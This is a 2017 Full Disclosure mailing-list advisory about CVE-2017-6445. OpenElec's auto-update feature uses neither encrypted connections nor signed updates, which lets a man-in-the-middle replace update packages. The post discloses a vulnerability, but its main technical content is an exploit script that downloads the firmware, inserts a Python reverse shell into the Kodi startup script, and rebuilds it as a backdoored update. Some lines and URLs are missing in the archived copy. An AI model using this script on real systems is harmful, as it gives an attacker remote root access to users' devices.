OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445)

fulldisclosure logo
Full Disclosure
mailing list archives

OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445)

From: Wolfgang <lister () feedyourhead at>

Date: Mon, 6 Mar 2017 13:32:27 +0100

During my research about update mechanisms of open-source software I
discovered vulnerabilities in OpenElec.

== [ OVERVIEW ] ==

    System affected: OpenElec
    CVE: CVE-2017-6445
    Vulnerable component: auto-update feature
    Software-Version: 6.0.3, 7.0.1
    User-Interaction: Reboot required
    Impact: Remote Code Execution with root permission


According to its website "Open Embedded Linux Entertainment Center
(OpenELEC) is a small Linux based Just Enough Operating System (JeOS)
built from scratch as a platform to turn your computer into a Kodi media


Automatic updates are disabled by default. After enabling it, OpenElec
connects to to find out if there
is an update for a newer version. If there is a newer version, openelec
will download it from<version>.tar(or any
other url returned by

The auto-update feature of OpenElec does neither use encrypted
connections nor does it use signed updates. A Man-In-The-Middle could
manipulate the update-packages to gain root-access remotely.
In order to run the downloaded firmware, the OpenElec-system has to be
rebooted. So at this point user-interaction is required.

== [ EXPLOIT ] ==

The following code downloads an openelec-firmware, extracts it, places a
reverse-shell into the kodi-startscript and finally generates a
backdoored firmware:


cd $TMP
test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar
test -d $OPENELEC || tar xvf ${OPENELEC}.tar
 test -d $TMP/unpacked || mkdir $TMP/unpacked

cd $TMP/unpacked

test -d $TMP/unpacked/squashfs-root || unsquashfs

cat > $TMP/unpacked/squashfs-root/usr/bin/ << EOF

 while true
python -c 'import
os.dup2(s.fileno(),2);["/bin/sh","-i"]);' > /dev/null 2>&1

chmod 777 $TMP/unpacked/squashfs-root/usr/bin/

awk '/trap cleanup TERM/ { print; print "/usr/bin/ &"; next
}1' $TMP/unpacked/squashfs-root/usr/lib/kodi/ >

mv $TMP/unpacked/squashfs-root/usr/lib/kodi/


chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/
mksquashfs squashfs-root/ SYS -noappend -comp gzip
md5sum target/SYSTEM > target/SYSTEM.md5
cd $TMP
tar cvf $OPENELEC.evil.tar $OPENELEC

test -d $TMP/unpacked && rm -fr $TMP/unpacked
test -d $OPENELEC && rm -rf $OPENELEC

== [ MITIGATION ] ==

Ensure that auto-update is disabled.

== [ Timeline ] ==

   * This bug was reported on December 03 2016.
   * Published as Zero-Day after no reply from OpenElec on March 04 2017

== [ CREDITS ] ==

CVE-2017-6445 was discovered by Wolfgang Hotwagner

Sent through the Full Disclosure mailing list
Web Archives & RSS:

  By Date  
  By Thread  

Current thread:

  • OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445) Wolfgang (Mar 06)

Source: Full Disclosure @ March 6, 2017 at 11:06AM